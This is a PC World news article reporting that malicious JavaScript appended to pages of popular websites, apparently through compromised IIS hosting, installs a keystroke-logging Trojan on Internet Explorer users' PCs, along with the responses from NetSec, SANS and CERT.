• PC World
• »Security

Internet users visiting some of the most popular sites on the Web may unwittingly be downloading malicious code that compromises their computers and sets up a relay network for a future onslaught of spam, a security services company warns.

NetSec, which provides managed security services for large businesses and government agencies, began detecting suspicious traffic on several of its customers' networks on Thursday morning, says Chief Technology Officer Brent Houlahan.

Examining firewall logs and other data points on those networks, NetSec found that when users visit certain popular Web sites--including an online auction, a search engine, and a comparison shopping site--they unwittingly download a piece of malicious JavaScript code attached to an image or graphics file on the site.

Without the user's knowledge, the code connects their PC to one of two IP addresses in North America and Russia. From those systems they unknowingly download a piece of malicious code that appears to install a keystroke reader and probably some other malicious code on the computer, Houlahan says.

The code may be gathering the addresses of Web sites visited by affected users and the passwords used to access them. In addition, the IP address in Russia is a known source of spam, and the code may be creating a network of infected machines that could be used to relay spam across the Internet at some later date, he says.

Under Investigation

He stressed that NetSec is still examining the code and has yet to determine the exact payload or the intent of the attack. The SANS Institute's Storm Center is also studying the outbreak and has found that the code surreptitiously downloads and installs a Trojan horse program named msits.exe, according to Johannes Ullrich, chief technology officer at The SANS Institute's Internet Storm Center.

Ullrich did not specify what functions are performed by the msits.exe Trojan.

NetSec declines to name the affected Web sites for liability reasons but says they are "big, big sites." It is probably the Web hosting facilities that cache content for those sites that are infected, rather than the "origin servers" at the Internet service providers themselves, Houlahan says.

"The tricks used in this particular attack method are nothing new. What's significant about this is the fact that it impacts major Web hosting facilities," says Dan Frasnelli, who manages NetSec's technical assistance center.

The attack affects only users running Microsoft's Windows operating system and Internet Explorer browser, he says. It was unclear Thursday how the attack originated, but it may exploit a known vulnerability in Microsoft's IIS (Internet Information Services) Web Server software at the Web hosting facilities, Frasnelli says.

The U.S. Computer Emergency Response Team (CERT) called on system administrators running IIS version 5 to verify to ensure there is no unusual JavaScript appended to the bottom of pages served by their system.

Widespread Problem?

It was also unclear Thursday afternoon how many systems had been compromised and how widespread the problem was. NetSec says it had protected its own customers by writing custom intrusion detection signatures and blocking its customers' PCs from visiting the IP addresses involved in the attack.

"There's a potential for widespread impact because currently the [antivirus] vendors don't have a signature for it," Frasnelli says.

CERT says the attack is another example of why users must exercise caution when JavaScript is enabled on their systems and recommended it be disabled unless it is absolutely necessary. The group warned even Web servers trusted by the user may be affected by this attack and contain malicious code.